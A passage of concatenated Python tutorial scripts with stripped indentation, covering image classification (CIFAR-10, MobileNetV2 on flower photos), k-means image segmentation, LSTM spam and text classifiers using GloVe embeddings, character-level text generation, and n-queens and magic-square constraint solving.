# y_test = to_categorical(y_test, num_classes)
# # convert to floats instead of int, so we can divide by 255
# X_train = X_train.astype("float32")
# X_test = X_test.astype("float32")
# X_train /= 255
# X_test /= 255
# return (X_train, y_train), (X_test, y_test)
# Loading data using Tensorflow Datasets
def preprocess_image(image, label):
# convert [0, 255] range integers to [0, 1] range floats
image = tf.image.convert_image_dtype(image, tf.float32)
return image, label
# loading the CIFAR-10 dataset, split between train and test sets
ds_train, info = tfds.load("cifar10", with_info=True, split="train", as_supervised=True)
ds_test = tfds.load("cifar10", split="test", as_supervised=True)
# repeat dataset forever, shuffle, preprocess, split by batch
ds_train = ds_train.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
ds_test = ds_test.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
return ds_train, ds_test, info
if __name__ == "__main__":
# load the data
ds_train, ds_test, info = load_data()
# (X_train, y_train), (X_test, y_test) = load_data()
# constructs the model
# model = create_model(input_shape=X_train.shape[1:])
model = create_model(input_shape=info.features["image"].shape)
# some nice callbacks
logdir = os.path.join("logs", "cifar10-model-v1")
tensorboard = TensorBoard(log_dir=logdir)
# make sure results folder exist
if not os.path.isdir("results"):
os.mkdir("results")
# train
# model.fit(X_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
# shuffle=True)
model.fit(ds_train, epochs=epochs, validation_data=ds_test, verbose=1,
steps_per_epoch=info.splits["train"].num_examples // batch_size,
validation_steps=info.splits["test"].num_examples // batch_size,
callbacks=[tensorboard])
# save the model to disk
model.save("results/cifar10-model-v1.h5")
from train import load_data, create_model, IMAGE_SHAPE, batch_size, np
import matplotlib.pyplot as plt
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# load the optimal weights
model.load_weights("results/MobileNetV2_finetune_last5_less_lr-loss-0.45-acc-0.86.h5")
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# print the validation loss & accuracy
evaluation = model.evaluate_generator(validation_generator, steps=validation_steps_per_epoch, verbose=1)
print("Val loss:", evaluation[0])
print("Val Accuracy:", evaluation[1])
# get a random batch of images
image_batch, label_batch = next(iter(validation_generator))
# turn the original labels into human-readable text
label_batch = [class_names[np.argmax(label_batch[i])] for i in range(batch_size)]
# predict the images on the model
predicted_class_names = model.predict(image_batch)
predicted_ids = [np.argmax(predicted_class_names[i]) for i in range(batch_size)]
# turn the predicted vectors to human readable labels
predicted_class_names = np.array([class_names[id] for id in predicted_ids])
# some nice plotting
plt.figure(figsize=(10,9))
for n in range(30):
plt.subplot(6,5,n+1)
plt.subplots_adjust(hspace = 0.3)
plt.imshow(image_batch[n])
if predicted_class_names[n] == label_batch[n]:
color = "blue"
title = predicted_class_names[n].title()
else:
color = "red"
title = f"{predicted_class_names[n].title()}, correct:{label_batch[n]}"
plt.title(title, color=color)
plt.axis('off')
_ = plt.suptitle("Model predictions (blue: correct, red: incorrect)")
plt.show()
import tensorflow as tf
from keras.models import Model
from keras.applications import MobileNetV2, ResNet50, InceptionV3 # try to use them and see which is better
from keras.layers import Dense
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.utils import get_file
from keras.preprocessing.image import ImageDataGenerator
import os
import pathlib
import numpy as np
batch_size = 32
num_classes = 5
epochs = 10
IMAGE_SHAPE = (224, 224, 3)
def load_data():
"""This function downloads, extracts, loads, normalizes and one-hot encodes Flower Photos dataset"""
# download the dataset and extract it
data_dir = get_file(origin='https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz',
fname='flower_photos', untar=True)
data_dir = pathlib.Path(data_dir)
# count how many images are there
image_count = len(list(data_dir.glob('*/*.jpg')))
print("Number of images:", image_count)
# get all classes for this dataset (types of flowers) excluding LICENSE file
CLASS_NAMES = np.array([item.name for item in data_dir.glob('*') if item.name != "LICENSE.txt"])
# roses = list(data_dir.glob('roses/*'))
# 20% validation set 80% training set
image_generator = ImageDataGenerator(rescale=1/255, validation_split=0.2)
# make the training dataset generator
train_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="training")
# make the validation dataset generator
test_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
shuffle=True, subset="validation")
return train_data_gen, test_data_gen, CLASS_NAMES
def create_model(input_shape):
# load MobileNetV2
model = MobileNetV2(input_shape=input_shape)
# remove the last fully connected layer
model.layers.pop()
# freeze all the weights of the model except the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our own fully connected layer for classification
output = Dense(num_classes, activation="softmax")
# connect that dense layer to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
# print the summary of the model architecture
model.summary()
# compile the model using the adam optimizer
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
if __name__ == "__main__":
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# model name
model_name = "MobileNetV2_finetune_last5"
# some nice callbacks
tensorboard = TensorBoard(log_dir=f"logs/{model_name}")
checkpoint = ModelCheckpoint(f"results/{model_name}" + "-loss-{val_loss:.2f}-acc-{val_acc:.2f}.h5",
save_best_only=True,
verbose=1)
# make sure the results folder exists
if not os.path.isdir("results"):
os.mkdir("results")
# count number of steps per epoch
training_steps_per_epoch = np.ceil(train_generator.samples / batch_size)
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# train using the generators
model.fit_generator(train_generator, steps_per_epoch=training_steps_per_epoch,
validation_data=validation_generator, validation_steps=validation_steps_per_epoch,
epochs=epochs, verbose=1, callbacks=[tensorboard, checkpoint])
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
# number of clusters (K)
k = 3
compactness, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# flatten the labels array
labels = labels.flatten()
# convert all pixels to the color of the centroids
segmented_image = centers[labels]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# show the image
plt.imshow(segmented_image)
plt.show()
# disable only cluster number 2 (turn its pixels black)
masked_image = np.copy(image)
# convert to the shape of a vector of pixel values
masked_image = masked_image.reshape((-1, 3))
# color (i.e cluster) to disable
cluster = 2
masked_image[labels == cluster] = [0, 0, 0]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.imshow(masked_image)
plt.show()
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
k = 5
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
while True:
# read the image
_, image = cap.read()
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# number of clusters (K)
_, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# convert all pixels to the color of the centroids
segmented_image = centers[labels.flatten()]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# reshape labels too
labels = labels.reshape(image.shape[0], image.shape[1])
cv2.imshow("segmented_image", segmented_image)
# visualize each segment
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
# to use CPU uncomment below code
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.model_selection import train_test_split
import time
import numpy as np
import pickle
from utils import get_embedding_vectors, get_model, SEQUENCE_LENGTH, EMBEDDING_SIZE, TEST_SIZE
from utils import BATCH_SIZE, EPOCHS, int2label, label2int
def load_data():
"""
Loads SMS Spam Collection dataset
"""
texts, labels = [], []
with open("data/SMSSpamCollection") as f:
for line in f:
split = line.split()
labels.append(split[0].strip())
texts.append(' '.join(split[1:]).strip())
return texts, labels
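# note (illustrative, not from the original file): each line of SMSSpamCollection is
# expected to be a tab-separated label followed by the message text, e.g.
#   ham<TAB>some harmless message text
#   spam<TAB>some promotional message text
# so split()[0] yields the label and the remaining tokens form the message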
# load the data
X, y = load_data()
# Text tokenization
# vectorizing text, turning each text into sequence of integers
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
# let's dump it to a file, so we can use it in testing
pickle.dump(tokenizer, open("results/tokenizer.pickle", "wb"))
# convert to sequence of integers
X = tokenizer.texts_to_sequences(X)
print(X[0])
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# pad sequences at the beginning of each sequence with 0's
# for example if SEQUENCE_LENGTH=4:
# [[5, 3, 2], [5, 1, 2, 3], [3, 4]]
# will be transformed to:
# [[0, 5, 3, 2], [5, 1, 2, 3], [0, 0, 3, 4]]
X = pad_sequences(X, maxlen=SEQUENCE_LENGTH)
print(X[0])
# One Hot encoding labels
# [spam, ham, spam, ham, ham] will be converted to:
# [1, 0, 1, 0, 1] and then to:
# [[0, 1], [1, 0], [0, 1], [1, 0], [0, 1]]
y = [ label2int[label] for label in y ]
y = to_categorical(y)
print(y[0])
# split and shuffle
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=7)
# constructs the model with 128 LSTM units
model = get_model(tokenizer=tokenizer, lstm_units=128)
# initialize our ModelCheckpoint and TensorBoard callbacks
# model checkpoint for saving best weights
model_checkpoint = ModelCheckpoint("results/spam_classifier_{val_loss:.2f}", save_best_only=True,
verbose=1)
# for better visualization
tensorboard = TensorBoard(f"logs/spam_classifier_{time.time()}")
# print our data shapes
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
# train the model
model.fit(X_train, y_train, validation_data=(X_test, y_test),
batch_size=BATCH_SIZE, epochs=EPOCHS,
callbacks=[tensorboard, model_checkpoint],
verbose=1)
# get the loss and metrics
result = model.evaluate(X_test, y_test)
# extract those
loss = result[0]
accuracy = result[1]
precision = result[2]
recall = result[3]
print(f"[+] Accuracy: {accuracy*100:.2f}%")
print(f"[+] Precision: {precision*100:.2f}%")
print(f"[+] Recall: {recall*100:.2f}%")
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from utils import get_model, int2label, label2int
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
SEQUENCE_LENGTH = 100
# get the tokenizer
tokenizer = pickle.load(open("results/tokenizer.pickle", "rb"))
model = get_model(tokenizer, 128)
model.load_weights("results/spam_classifier_0.05")
def get_predictions(text):
sequence = tokenizer.texts_to_sequences([text])
# pad the sequence
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
# one-hot encoded vector, revert using np.argmax
return int2label[np.argmax(prediction)]
while True:
text = input("Enter the mail:")
# convert to sequences
print(get_predictions(text))
import tqdm
import numpy as np
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, LSTM, Dropout, Dense
from keras.models import Sequential
import keras_metrics
SEQUENCE_LENGTH = 100 # the length of all sequences (number of words per sample)
EMBEDDING_SIZE = 100 # Using 100-Dimensional GloVe embedding vectors
TEST_SIZE = 0.25 # ratio of testing set
BATCH_SIZE = 64
EPOCHS = 20 # number of epochs
label2int = {"ham": 0, "spam": 1}
int2label = {0: "ham", 1: "spam"}
def get_embedding_vectors(tokenizer, dim=100):
embedding_index = {}
with open(f"data/glove.6B.{dim}d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
# we do +1 because Tokenizer() starts from 1
embedding_matrix = np.zeros((len(word_index)+1, dim))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def get_model(tokenizer, lstm_units):
"""
Constructs the model,
Embedding vectors => LSTM => 2 output Fully-Connected neurons with softmax activation
"""
# get the GloVe embedding vectors
embedding_matrix = get_embedding_vectors(tokenizer)
model = Sequential()
model.add(Embedding(len(tokenizer.word_index)+1,
EMBEDDING_SIZE,
weights=[embedding_matrix],
trainable=False,
input_length=SEQUENCE_LENGTH))
model.add(LSTM(lstm_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(2, activation="softmax"))
# compile with the rmsprop optimizer,
# as well as precision and recall metrics
model.compile(optimizer="rmsprop", loss="categorical_crossentropy",
metrics=["accuracy", keras_metrics.precision(), keras_metrics.recall()])
model.summary()
return model
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_20_newsgroup_data
# create these folders if they do not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, 20 newsgroups dataset
dataset_name = "20_news_group"
# get the unique model name based on the hyperparameters in parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.layers import LSTM
# max number of words in each sentence
SEQUENCE_LENGTH = 300
# N-Dimensional GloVe embedding vectors
EMBEDDING_SIZE = 300
# number of words to use, discarding the rest
N_WORDS = 10000
# out of vocabulary token
OOV_TOKEN = None
# 30% testing set, 70% training set
TEST_SIZE = 0.3
# number of CELL layers
N_LAYERS = 1
# the RNN cell to use, LSTM in this case
RNN_CELL = LSTM
# whether it's a bidirectional RNN
IS_BIDIRECTIONAL = False
# number of units (RNN_CELL ,nodes) in each layer
UNITS = 128
# dropout rate
DROPOUT = 0.4
### Training parameters
LOSS = "categorical_crossentropy"
OPTIMIZER = "adam"
BATCH_SIZE = 64
EPOCHS = 6
def get_model_name(dataset_name):
# construct the unique model name
model_name = f"{dataset_name}-{RNN_CELL.__name__}-seq-{SEQUENCE_LENGTH}-em-{EMBEDDING_SIZE}-w-{N_WORDS}-layers-{N_LAYERS}-units-{UNITS}-opt-{OPTIMIZER}-BS-{BATCH_SIZE}-d-{DROPOUT}"
if IS_BIDIRECTIONAL:
# add 'bid' str if bidirectional
model_name = "bid-" + model_name
if OOV_TOKEN:
# add 'oov' str if OOV token is specified
model_name += "-oov"
return model_name
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_imdb_data
# create these folders if they do not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on the hyperparameters in parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.preprocessing.sequence import pad_sequences
import numpy as np
from parameters import *
from utils import create_model, load_20_newsgroup_data, load_imdb_data
import pickle
import os
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on the hyperparameters in parameters.py
model_name = get_model_name(dataset_name)
# data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.load_weights(os.path.join("results", f"{model_name}.h5"))
def get_predictions(text):
sequence = data["tokenizer"].texts_to_sequences([text])
# pad the sequences
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
print("output vector:", prediction)
return data["int2label"][np.argmax(prediction)]
while True:
text = input("Enter your text: ")
prediction = get_predictions(text)
print("="*50)
print("The class is:", prediction)
from tqdm import tqdm
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
from sklearn.model_selection import train_test_split
from sklearn.datasets import fetch_20newsgroups
from glob import glob
import random
def get_embedding_vectors(word_index, embedding_size=100):
embedding_matrix = np.zeros((len(word_index) + 1, embedding_size))
with open(f"data/glove.6B.{embedding_size}d.txt", encoding="utf8") as f:
for line in tqdm(f, "Reading GloVe"):
values = line.split()
# get the word as the first word in the line
word = values[0]
if word in word_index:
idx = word_index[word]
# get the vectors as the remaining values in the line
embedding_matrix[idx] = np.array(values[1:], dtype="float32")
return embedding_matrix
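# the returned matrix has shape (len(word_index) + 1, embedding_size); rows for words
# that do not appear in the GloVe file are left as all zeros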
def create_model(word_index, units=128, n_layers=1, cell=LSTM, bidirectional=False,
embedding_size=100, sequence_length=100, dropout=0.3,
loss="categorical_crossentropy", optimizer="adam",
output_length=2):
"""
Constructs an RNN model given its parameters
"""
embedding_matrix = get_embedding_vectors(word_index, embedding_size)
model = Sequential()
# add the embedding layer
model.add(Embedding(len(word_index) + 1,
embedding_size,
weights=[embedding_matrix],
trainable=False,
input_length=sequence_length))
for i in range(n_layers):
if i == n_layers - 1:
# last layer
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=False)))
else:
model.add(cell(units, return_sequences=False))
else:
# first layer or hidden layers
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(output_length, activation="softmax"))
# compile the model
model.compile(optimizer=optimizer, loss=loss, metrics=["accuracy"])
return model
def load_imdb_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# read reviews
reviews = []
with open("data/reviews.txt") as f:
for review in f:
review = review.strip()
reviews.append(review)
labels = []
with open("data/labels.txt") as f:
for label in f:
label = label.strip()
labels.append(label)
# tokenize the dataset corpus, delete uncommon words such as names, etc.
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(reviews)
X = tokenizer.texts_to_sequences(reviews)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = {0: "negative", 1: "positive"}
data["label2int"] = {"negative": 0, "positive": 1}
return data
def load_20_newsgroup_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# load the 20 news groups dataset
# shuffling the data & removing each document's header, signature blocks and quotation blocks
dataset = fetch_20newsgroups(subset="all", shuffle=True, remove=("headers", "footers", "quotes"))
documents = dataset.data
labels = dataset.target
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(documents)
X = tokenizer.texts_to_sequences(documents)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = { i: label for i, label in enumerate(dataset.target_names) }
data["label2int"] = { label: i for i, label in enumerate(dataset.target_names) }
return data
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
message = """
Please choose which model you want to generate text with:
1 - Alice's wonderland
2 - Python Code
"""
choice = int(input(message))
assert choice == 1 or choice == 2
if choice == 1:
char2int = pickle.load(open("data/wonderland-char2int.pickle", "rb"))
int2char = pickle.load(open("data/wonderland-int2char.pickle", "rb"))
elif choice == 2:
char2int = pickle.load(open("data/python-char2int.pickle", "rb"))
int2char = pickle.load(open("data/python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
if choice == 1:
model.load_weights("results/wonderland-v2-0.75.h5")
elif choice == 2:
model.load_weights("results/python-v2-0.30.h5")
seed = ""
print("Enter the seed, enter q to quit, maximum 100 characters:")
while True:
result = input("")
if result.lower() == "q":
break
seed += f"{result}\n"
seed = seed.lower()
n_chars = int(input("Enter number of characters you want to generate: "))
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(n_chars), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import tensorflow as tf
import numpy as np
import os
import pickle
SEQUENCE_LENGTH = 200
FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
text = open(FILE_PATH).read()
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("vocab:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
encoded_text = np.array([char2int[c] for c in text])
import tensorflow as tf
import numpy as np
import os
import pickle
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint
from string import punctuation
sequence_length = 100
BATCH_SIZE = 128
EPOCHS = 30
# dataset file path
FILE_PATH = "data/wonderland.txt"
# FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
# commented because already downloaded
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
# read the data
text = open(FILE_PATH, encoding="utf-8").read()
# remove caps, comment this code if you want uppercase characters as well
text = text.lower()
# remove punctuation
text = text.translate(str.maketrans("", "", punctuation))
# print some stats
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("unique_chars:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
# convert all text into integers
encoded_text = np.array([char2int[c] for c in text])
# construct tf.data.Dataset object
char_dataset = tf.data.Dataset.from_tensor_slices(encoded_text)
# print first 5 characters
for char in char_dataset.take(5):
print(char.numpy())
# build sequences by batching
sequences = char_dataset.batch(2*sequence_length + 1, drop_remainder=True)
def split_sample(sample):
ds = tf.data.Dataset.from_tensors((sample[:sequence_length], sample[sequence_length]))
for i in range(1, (len(sample)-1) // 2):
input_ = sample[i: i+sequence_length]
target = sample[i+sequence_length]
other_ds = tf.data.Dataset.from_tensors((input_, target))
ds = ds.concatenate(other_ds)
return ds
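# rough illustration of split_sample (toy numbers, not from the dataset):
# with sequence_length = 3, a batched sample [1, 2, 3, 4, 5, 6, 7] is split into the
# (input, target) pairs ([1, 2, 3], 4), ([2, 3, 4], 5), ([3, 4, 5], 6) -
# a sliding window of characters with the next character as the prediction target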
def one_hot_samples(input_, target):
return tf.one_hot(input_, n_unique_chars), tf.one_hot(target, n_unique_chars)
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
# vectorization
X = np.zeros((len(sentences), sequence_length, n_unique_chars))
y = np.zeros((len(sentences), n_unique_chars))
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
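# after this loop, X has shape (num_sentences, sequence_length, n_unique_chars) with a
# one-hot vector per character, and y one-hot encodes the single character that follows
# each sentence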
print("X.shape:", X.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# a better model (slower to train obviously)
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
# model.load_weights("results/wonderland-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/wonderland-v2-{loss:.2f}.h5", verbose=1)
# train the model
model.fit(X, y, batch_size=BATCH_SIZE, epochs=EPOCHS, callbacks=[checkpoint])
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
result = True
for i in range(1, n):
result = result and ( a != b + i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
